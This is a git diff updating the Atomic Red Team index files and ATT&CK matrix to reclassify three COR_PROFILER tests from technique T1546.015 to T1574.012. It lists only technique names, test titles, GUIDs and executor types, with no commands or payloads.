@@ -221,6 +221,9 @@ defense-evasion,T1548.002,Bypass User Access Control,6,Bypass UAC by Mocking Tru defense-evasion,T1548.002,Bypass User Access Control,7,Bypass UAC using sdclt DelegateExecute,3be891eb-4608-4173-87e8-78b494c029b7,powershell defense-evasion,T1218.003,CMSTP,1,CMSTP Executing Remote Scriptlet,34e63321-9683-496b-bbc1-7566bc55e624,command_prompt defense-evasion,T1218.003,CMSTP,2,CMSTP Executing UAC Bypass,748cb4f6-2fb3-4e97-b7ad-b22635a09ab0,command_prompt +defense-evasion,T1574.012,COR_PROFILER,1,User scope COR_PROFILER,9d5f89dc-c3a5-4f8a-a4fc-a6ed02e7cb5a,powershell +defense-evasion,T1574.012,COR_PROFILER,2,System Scope COR_PROFILER,f373b482-48c8-4ce4-85ed-d40c8b3f7310,powershell +defense-evasion,T1574.012,COR_PROFILER,3,Registry-free process scope COR_PROFILER,79d57242-bbef-41db-b301-9d01d9f6e817,powershell defense-evasion,T1070.003,Clear Command History,1,Clear Bash history (rm),a934276e-2be5-4a36-93fd-98adbb5bd4fc,sh defense-evasion,T1070.003,Clear Command History,2,Clear Bash history (echo),cbf506a5-dd78-43e5-be7e-a46b7c7a0a11,sh defense-evasion,T1070.003,Clear Command History,3,Clear Bash history (cat dev/null),b1251c35-dcd3-4ea1-86da-36d27b54f31f,sh diff --git a/atomics/Indexes/Indexes-CSV/windows-index.csv b/atomics/Indexes/Indexes-CSV/windows-index.csv index 24a2d7de..e04b500f 100644 --- a/atomics/Indexes/Indexes-CSV/windows-index.csv +++ b/atomics/Indexes/Indexes-CSV/windows-index.csv 
@@ -13,10 +13,10 @@ privilege-escalation,T1548.002,Bypass User Access Control,4,Bypass UAC using Fod privilege-escalation,T1548.002,Bypass User Access Control,5,Bypass UAC using ComputerDefaults (PowerShell),3c51abf2-44bf-42d8-9111-dc96ff66750f,powershell privilege-escalation,T1548.002,Bypass User Access Control,6,Bypass UAC by Mocking Trusted Directories,f7a35090-6f7f-4f64-bb47-d657bf5b10c1,command_prompt privilege-escalation,T1548.002,Bypass User Access Control,7,Bypass UAC using sdclt DelegateExecute,3be891eb-4608-4173-87e8-78b494c029b7,powershell +privilege-escalation,T1574.012,COR_PROFILER,1,User scope COR_PROFILER,9d5f89dc-c3a5-4f8a-a4fc-a6ed02e7cb5a,powershell +privilege-escalation,T1574.012,COR_PROFILER,2,System Scope COR_PROFILER,f373b482-48c8-4ce4-85ed-d40c8b3f7310,powershell +privilege-escalation,T1574.012,COR_PROFILER,3,Registry-free process scope COR_PROFILER,79d57242-bbef-41db-b301-9d01d9f6e817,powershell privilege-escalation,T1546.001,Change Default File Association,1,Change Default File Association,10a08978-2045-4d62-8c42-1957bbbea102,command_prompt -privilege-escalation,T1546.015,Component Object Model Hijacking,1,COM Hijack Leveraging user scope COR_PROFILER,9d5f89dc-c3a5-4f8a-a4fc-a6ed02e7cb5a,powershell -privilege-escalation,T1546.015,Component Object Model Hijacking,2,COM Hijack Leveraging System Scope COR_PROFILER,f373b482-48c8-4ce4-85ed-d40c8b3f7310,powershell -privilege-escalation,T1546.015,Component Object Model Hijacking,3,COM Hijack Leveraging registry-free process scope COR_PROFILER,79d57242-bbef-41db-b301-9d01d9f6e817,powershell privilege-escalation,T1574.001,DLL Search Order Hijacking,1,DLL Search Order Hijacking - amsi.dll,8549ad4b-b5df-4a2d-a3d7-2aee9e7052a3,command_prompt privilege-escalation,T1574.002,DLL Side-Loading,1,DLL Side-Loading using the Notepad++ GUP.exe binary,65526037-7079-44a9-bda1-2cb624838040,command_prompt privilege-escalation,T1078.001,Default Accounts,1,Enable Guest account with RDP capability and admin 
priviliges,99747561-ed8d-47f2-9c91-1e5fde1ed6e0,command_prompt @@ -65,6 +65,9 @@ defense-evasion,T1548.002,Bypass User Access Control,6,Bypass UAC by Mocking Tru defense-evasion,T1548.002,Bypass User Access Control,7,Bypass UAC using sdclt DelegateExecute,3be891eb-4608-4173-87e8-78b494c029b7,powershell defense-evasion,T1218.003,CMSTP,1,CMSTP Executing Remote Scriptlet,34e63321-9683-496b-bbc1-7566bc55e624,command_prompt defense-evasion,T1218.003,CMSTP,2,CMSTP Executing UAC Bypass,748cb4f6-2fb3-4e97-b7ad-b22635a09ab0,command_prompt +defense-evasion,T1574.012,COR_PROFILER,1,User scope COR_PROFILER,9d5f89dc-c3a5-4f8a-a4fc-a6ed02e7cb5a,powershell +defense-evasion,T1574.012,COR_PROFILER,2,System Scope COR_PROFILER,f373b482-48c8-4ce4-85ed-d40c8b3f7310,powershell +defense-evasion,T1574.012,COR_PROFILER,3,Registry-free process scope COR_PROFILER,79d57242-bbef-41db-b301-9d01d9f6e817,powershell defense-evasion,T1070.001,Clear Windows Event Logs,1,Clear Logs,e6abb60e-26b8-41da-8aae-0c35174b0967,command_prompt defense-evasion,T1070.001,Clear Windows Event Logs,2,Delete System Logs Using Clear-EventLog,b13e9306-3351-4b4b-a6e8-477358b0b498,powershell defense-evasion,T1027.004,Compile After Delivery,1,Compile After Delivery using csc.exe,ffcdbd6a-b0e8-487d-927a-09127fe9a206,command_prompt 
@@ -207,10 +210,10 @@ persistence,T1176,Browser Extensions,1,Chrome (Developer Mode),3ecd790d-2617-4ab persistence,T1176,Browser Extensions,2,Chrome (Chrome Web Store),4c83940d-8ca5-4bb2-8100-f46dc914bc3f,manual persistence,T1176,Browser Extensions,3,Firefox,cb790029-17e6-4c43-b96f-002ce5f10938,manual persistence,T1176,Browser Extensions,4,Edge Chromium Addon - VPN,3d456e2b-a7db-4af8-b5b3-720e7c4d9da5,manual +persistence,T1574.012,COR_PROFILER,1,User scope COR_PROFILER,9d5f89dc-c3a5-4f8a-a4fc-a6ed02e7cb5a,powershell +persistence,T1574.012,COR_PROFILER,2,System Scope COR_PROFILER,f373b482-48c8-4ce4-85ed-d40c8b3f7310,powershell +persistence,T1574.012,COR_PROFILER,3,Registry-free process scope COR_PROFILER,79d57242-bbef-41db-b301-9d01d9f6e817,powershell persistence,T1546.001,Change Default File Association,1,Change Default File Association,10a08978-2045-4d62-8c42-1957bbbea102,command_prompt -persistence,T1546.015,Component Object Model Hijacking,1,COM Hijack Leveraging user scope COR_PROFILER,9d5f89dc-c3a5-4f8a-a4fc-a6ed02e7cb5a,powershell -persistence,T1546.015,Component Object Model Hijacking,2,COM Hijack Leveraging System Scope COR_PROFILER,f373b482-48c8-4ce4-85ed-d40c8b3f7310,powershell -persistence,T1546.015,Component Object Model Hijacking,3,COM Hijack Leveraging registry-free process scope COR_PROFILER,79d57242-bbef-41db-b301-9d01d9f6e817,powershell persistence,T1574.001,DLL Search Order Hijacking,1,DLL Search Order Hijacking - amsi.dll,8549ad4b-b5df-4a2d-a3d7-2aee9e7052a3,command_prompt persistence,T1574.002,DLL Side-Loading,1,DLL Side-Loading using the Notepad++ GUP.exe binary,65526037-7079-44a9-bda1-2cb624838040,command_prompt persistence,T1078.001,Default Accounts,1,Enable Guest account with RDP capability and admin priviliges,99747561-ed8d-47f2-9c91-1e5fde1ed6e0,command_prompt diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md index af181089..65d973af 100644 --- a/atomics/Indexes/Indexes-Markdown/index.md 
+++ b/atomics/Indexes/Indexes-Markdown/index.md @@ -31,14 +31,14 @@ - Atomic Test #5: Bypass UAC using ComputerDefaults (PowerShell) [windows] - Atomic Test #6: Bypass UAC by Mocking Trusted Directories [windows] - Atomic Test #7: Bypass UAC using sdclt DelegateExecute [windows] -- T1574.012 COR_PROFILER [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- [T1574.012 COR_PROFILER](../../T1574.012/T1574.012.md) + - Atomic Test #1: User scope COR_PROFILER [windows] + - Atomic Test #2: System Scope COR_PROFILER [windows] + - Atomic Test #3: Registry-free process scope COR_PROFILER [windows] - [T1546.001 Change Default File Association](../../T1546.001/T1546.001.md) - Atomic Test #1: Change Default File Association [windows] - T1078.004 Cloud Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- [T1546.015 Component Object Model Hijacking](../../T1546.015/T1546.015.md) - - Atomic Test #1: COM Hijack Leveraging user scope COR_PROFILER [windows] - - Atomic Test #2: COM Hijack Leveraging System Scope COR_PROFILER [windows] - - Atomic Test #3: COM Hijack Leveraging registry-free process scope COR_PROFILER [windows] +- T1546.015 Component Object Model Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1134.002 Create Process with Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1543 Create or Modify System Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1053.003 Cron](../../T1053.003/T1053.003.md) 
@@ -204,16 +204,16 @@ - Atomic Test #2: Chrome (Chrome Web Store) [linux, windows, macos] - Atomic Test #3: Firefox [linux, windows, macos] - Atomic Test #4: Edge Chromium Addon - VPN [windows, macos] -- T1574.012 COR_PROFILER [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- [T1574.012 COR_PROFILER](../../T1574.012/T1574.012.md) + - Atomic Test #1: User scope COR_PROFILER [windows] + - Atomic Test #2: System Scope COR_PROFILER [windows] + - Atomic Test #3: Registry-free process scope COR_PROFILER [windows] - [T1546.001 Change Default File Association](../../T1546.001/T1546.001.md) - Atomic Test #1: Change Default File Association [windows] - T1136.003 Cloud Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1078.004 Cloud Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1542.002 Component Firmware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- [T1546.015 Component Object Model Hijacking](../../T1546.015/T1546.015.md) - - Atomic Test #1: COM Hijack Leveraging user scope COR_PROFILER [windows] - - Atomic Test #2: COM Hijack Leveraging System Scope COR_PROFILER [windows] - - Atomic Test #3: COM Hijack Leveraging registry-free process scope COR_PROFILER [windows] +- T1546.015 Component Object Model Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1554 Compromise Client Software Binary [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1136 Create Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1543 Create or Modify System Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) 
@@ -467,7 +467,10 @@ - [T1218.003 CMSTP](../../T1218.003/T1218.003.md) - Atomic Test #1: CMSTP Executing Remote Scriptlet [windows] - Atomic Test #2: CMSTP Executing UAC Bypass [windows] -- T1574.012 COR_PROFILER [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- [T1574.012 COR_PROFILER](../../T1574.012/T1574.012.md) + - Atomic Test #1: User scope COR_PROFILER [windows] + - Atomic Test #2: System Scope COR_PROFILER [windows] + - Atomic Test #3: Registry-free process scope COR_PROFILER [windows] - [T1070.003 Clear Command History](../../T1070.003/T1070.003.md) - Atomic Test #1: Clear Bash history (rm) [linux, macos] - Atomic Test #2: Clear Bash history (echo) [linux, macos] diff --git a/atomics/Indexes/Indexes-Markdown/windows-index.md b/atomics/Indexes/Indexes-Markdown/windows-index.md index 7880cd3c..63b7389c 100644 --- a/atomics/Indexes/Indexes-Markdown/windows-index.md +++ b/atomics/Indexes/Indexes-Markdown/windows-index.md 
@@ -26,13 +26,13 @@ - Atomic Test #5: Bypass UAC using ComputerDefaults (PowerShell) [windows] - Atomic Test #6: Bypass UAC by Mocking Trusted Directories [windows] - Atomic Test #7: Bypass UAC using sdclt DelegateExecute [windows] -- T1574.012 COR_PROFILER [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- [T1574.012 COR_PROFILER](../../T1574.012/T1574.012.md) + - Atomic Test #1: User scope COR_PROFILER [windows] + - Atomic Test #2: System Scope COR_PROFILER [windows] + - Atomic Test #3: Registry-free process scope COR_PROFILER [windows] - [T1546.001 Change Default File Association](../../T1546.001/T1546.001.md) - Atomic Test #1: Change Default File Association [windows] -- [T1546.015 Component Object Model Hijacking](../../T1546.015/T1546.015.md) - - Atomic Test #1: COM Hijack Leveraging user scope COR_PROFILER [windows] - - Atomic Test #2: COM Hijack Leveraging System Scope COR_PROFILER [windows] - - Atomic Test #3: COM Hijack Leveraging registry-free process scope COR_PROFILER [windows] +- T1546.015 Component Object Model Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1134.002 Create Process with Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1543 Create or Modify System Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1574.001 DLL Search Order Hijacking](../../T1574.001/T1574.001.md) 
@@ -139,7 +139,10 @@ - [T1218.003 CMSTP](../../T1218.003/T1218.003.md) - Atomic Test #1: CMSTP Executing Remote Scriptlet [windows] - Atomic Test #2: CMSTP Executing UAC Bypass [windows] -- T1574.012 COR_PROFILER [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- [T1574.012 COR_PROFILER](../../T1574.012/T1574.012.md) + - Atomic Test #1: User scope COR_PROFILER [windows] + - Atomic Test #2: System Scope COR_PROFILER [windows] + - Atomic Test #3: Registry-free process scope COR_PROFILER [windows] - [T1070.001 Clear Windows Event Logs](../../T1070.001/T1070.001.md) - Atomic Test #1: Clear Logs [windows] - Atomic Test #2: Delete System Logs Using Clear-EventLog [windows] 
@@ -399,14 +402,14 @@ - Atomic Test #2: Chrome (Chrome Web Store) [linux, windows, macos] - Atomic Test #3: Firefox [linux, windows, macos] - Atomic Test #4: Edge Chromium Addon - VPN [windows, macos] -- T1574.012 COR_PROFILER [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- [T1574.012 COR_PROFILER](../../T1574.012/T1574.012.md) + - Atomic Test #1: User scope COR_PROFILER [windows] + - Atomic Test #2: System Scope COR_PROFILER [windows] + - Atomic Test #3: Registry-free process scope COR_PROFILER [windows] - [T1546.001 Change Default File Association](../../T1546.001/T1546.001.md) - Atomic Test #1: Change Default File Association [windows] - T1542.002 Component Firmware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- [T1546.015 Component Object Model Hijacking](../../T1546.015/T1546.015.md) - - Atomic Test #1: COM Hijack Leveraging user scope COR_PROFILER [windows] - - Atomic Test #2: COM Hijack Leveraging System Scope COR_PROFILER [windows] - - Atomic Test #3: COM Hijack Leveraging registry-free process scope COR_PROFILER [windows] +- T1546.015 Component Object Model Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1554 Compromise Client Software Binary [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1136 Create Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1543 Create or Modify System Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) diff --git a/atomics/Indexes/Matrices/matrix.md b/atomics/Indexes/Matrices/matrix.md index bb274f6b..0fba463c 100644 --- a/atomics/Indexes/Matrices/matrix.md +++ b/atomics/Indexes/Matrices/matrix.md 
@@ -10,20 +10,20 @@ | Drive-by Compromise [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Cron](../../T1053.003/T1053.003.md) | AppCert DLLs [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Application Shimming](../../T1546.011/T1546.011.md) | Bootkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Credential Stuffing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Cloud Service Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Pass the Hash](../../T1550.002/T1550.002.md) | [Clipboard Data](../../T1115/T1115.md) | Exfiltration Over Other Network Medium [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | DNS Calculation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Exploit Public-Facing Application [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Dynamic Data Exchange](../../T1559.002/T1559.002.md) | [AppInit DLLs](../../T1546.010/T1546.010.md) | [Asynchronous Procedure Call](../../T1055.004/T1055.004.md) | [Bypass User Access Control](../../T1548.002/T1548.002.md) | [Credentials In Files](../../T1552.001/T1552.001.md) | [Domain Account](../../T1087.002/T1087.002.md) | [Pass the Ticket](../../T1550.003/T1550.003.md) | Confluence [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Physical Medium [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Encoding [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Direct Network Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | External Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Client Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Application Shimming](../../T1546.011/T1546.011.md) | [At (Linux)](../../T1053.001/T1053.001.md) | [CMSTP](../../T1218.003/T1218.003.md) | Credentials from Password 
Stores [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Domain Groups](../../T1069.002/T1069.002.md) | [RDP Hijacking](../../T1563.002/T1563.002.md) | [Credential API Hooking](../../T1056.004/T1056.004.md) | Exfiltration Over Symmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Obfuscation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disk Content Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | -| Hardware Additions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Graphical User Interface [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [At (Linux)](../../T1053.001/T1053.001.md) | [At (Windows)](../../T1053.002/T1053.002.md) | COR_PROFILER [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Credentials from Web Browsers](../../T1555.003/T1555.003.md) | [Domain Trust Discovery](../../T1482/T1482.md) | [Remote Desktop Protocol](../../T1021.001/T1021.001.md) | Data Staged [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol](../../T1048.003/T1048.003.md) | Dead Drop Resolver [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disk Structure Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | +| Hardware Additions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Graphical User Interface [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [At (Linux)](../../T1053.001/T1053.001.md) | [At (Windows)](../../T1053.002/T1053.002.md) | [COR_PROFILER](../../T1574.012/T1574.012.md) | [Credentials from Web Browsers](../../T1555.003/T1555.003.md) | [Domain Trust Discovery](../../T1482/T1482.md) | [Remote Desktop Protocol](../../T1021.001/T1021.001.md) | Data Staged [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol](../../T1048.003/T1048.003.md) | Dead Drop Resolver [CONTRIBUTE A 
TEST](https://atomicredteam.io/contributing) | Disk Structure Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Local Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Inter-Process Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [At (Windows)](../../T1053.002/T1053.002.md) | Authentication Package [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Clear Command History](../../T1070.003/T1070.003.md) | [Credentials in Registry](../../T1552.002/T1552.002.md) | Email Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Remote Service Session Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data from Cloud Storage Object [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Web Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Fronting [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disk Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Phishing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | JavaScript/JScript [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Authentication Package [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Clear Linux or Mac System Logs](../../T1070.002/T1070.002.md) | DCSync [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [File and Directory Discovery](../../T1083/T1083.md) | Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data from Information Repositories [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration over USB [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Generation Algorithms [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Endpoint Denial of Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | 
Replication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Launchctl](../../T1569.001/T1569.001.md) | [BITS Jobs](../../T1197/T1197.md) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Clear Windows Event Logs](../../T1070.001/T1070.001.md) | Domain Controller Authentication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Local Account](../../T1087.001/T1087.001.md) | Replication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data from Local System [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration to Cloud Storage [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Dynamic Resolution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | External Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Spearphishing Attachment](../../T1566.001/T1566.001.md) | [Launchd](../../T1053.004/T1053.004.md) | Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Bypass User Access Control](../../T1548.002/T1548.002.md) | Cloud Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Credential Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Local Groups](../../T1069.001/T1069.001.md) | [SMB/Windows Admin Shares](../../T1021.002/T1021.002.md) | Data from Network Shared Drive [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration to Code Repository [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Encrypted Channel](../../T1573/T1573.md) | Firmware Corruption [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | -| Spearphishing Link [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Malicious File](../../T1204.002/T1204.002.md) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | COR_PROFILER 
[CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Code Signing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Forced Authentication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Network Service Scanning](../../T1046/T1046.md) | SSH [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data from Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Scheduled Transfer [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | External Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Inhibit System Recovery](../../T1490/T1490.md) | +| Spearphishing Link [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Malicious File](../../T1204.002/T1204.002.md) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [COR_PROFILER](../../T1574.012/T1574.012.md) | Code Signing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Forced Authentication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Network Service Scanning](../../T1046/T1046.md) | SSH [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data from Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Scheduled Transfer [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | External Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Inhibit System Recovery](../../T1490/T1490.md) | | Spearphishing via Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Malicious Link [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Bootkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Change Default File Association](../../T1546.001/T1546.001.md) | [Compile After Delivery](../../T1027.004/T1027.004.md) | [GUI Input Capture](../../T1056.002/T1056.002.md) | [Network Share Discovery](../../T1135/T1135.md) | SSH Hijacking [CONTRIBUTE A 
TEST](https://atomicredteam.io/contributing) | Email Collection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Transfer Data to Cloud Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Fallback Channels [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Internal Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Supply Chain Compromise [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Native API](../../T1106/T1106.md) | [Browser Extensions](../../T1176/T1176.md) | Cloud Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Compiled HTML File](../../T1218.001/T1218.001.md) | Golden Ticket [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Network Sniffing](../../T1040/T1040.md) | Shared Webroot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Email Forwarding Rule [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Fast Flux DNS [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Network Denial of Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | -| Trusted Relationship [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [PowerShell](../../T1059.001/T1059.001.md) | COR_PROFILER [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Component Object Model Hijacking](../../T1546.015/T1546.015.md) | Component Firmware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Group Policy Preferences](../../T1552.006/T1552.006.md) | [Password Policy Discovery](../../T1201/T1201.md) | Software Deployment Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [GUI Input Capture](../../T1056.002/T1056.002.md) | | File Transfer Protocols [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | OS Exhaustion Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | +| Trusted Relationship [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | 
[PowerShell](../../T1059.001/T1059.001.md) | [COR_PROFILER](../../T1574.012/T1574.012.md) | Component Object Model Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Component Firmware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Group Policy Preferences](../../T1552.006/T1552.006.md) | [Password Policy Discovery](../../T1201/T1201.md) | Software Deployment Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [GUI Input Capture](../../T1056.002/T1056.002.md) | | File Transfer Protocols [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | OS Exhaustion Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Python [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Change Default File Association](../../T1546.001/T1546.001.md) | Create Process with Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Control Panel](../../T1218.002/T1218.002.md) | Input Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Peripheral Device Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Taint Shared Content [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Input Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Ingress Tool Transfer](../../T1105/T1105.md) | Reflection Amplification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | [Scheduled Task](../../T1053.005/T1053.005.md) | Cloud Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create or Modify System Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create Cloud Instance [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Kerberoasting](../../T1558.003/T1558.003.md) | Permission Groups Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Use Alternate Authentication Material [CONTRIBUTE A 
TEST](https://atomicredteam.io/contributing) | [Keylogging](../../T1056.001/T1056.001.md) | | [Internal Proxy](../../T1090.001/T1090.001.md) | [Resource Hijacking](../../T1496/T1496.md) | | | Scheduled Task/Job [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Cloud Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Cron](../../T1053.003/T1053.003.md) | Create Process with Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Keychain](../../T1555.001/T1555.001.md) | [Process Discovery](../../T1057/T1057.md) | VNC [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | LLMNR/NBT-NS Poisoning and SMB Relay [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Junk Data [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Runtime Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | Scripting [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Component Firmware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [DLL Search Order Hijacking](../../T1574.001/T1574.001.md) | Create Snapshot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Keylogging](../../T1056.001/T1056.001.md) | [Query Registry](../../T1012/T1012.md) | Web Session Cookie [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Local Data Staging](../../T1074.001/T1074.001.md) | | Mail Protocols [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Service Exhaustion Flood 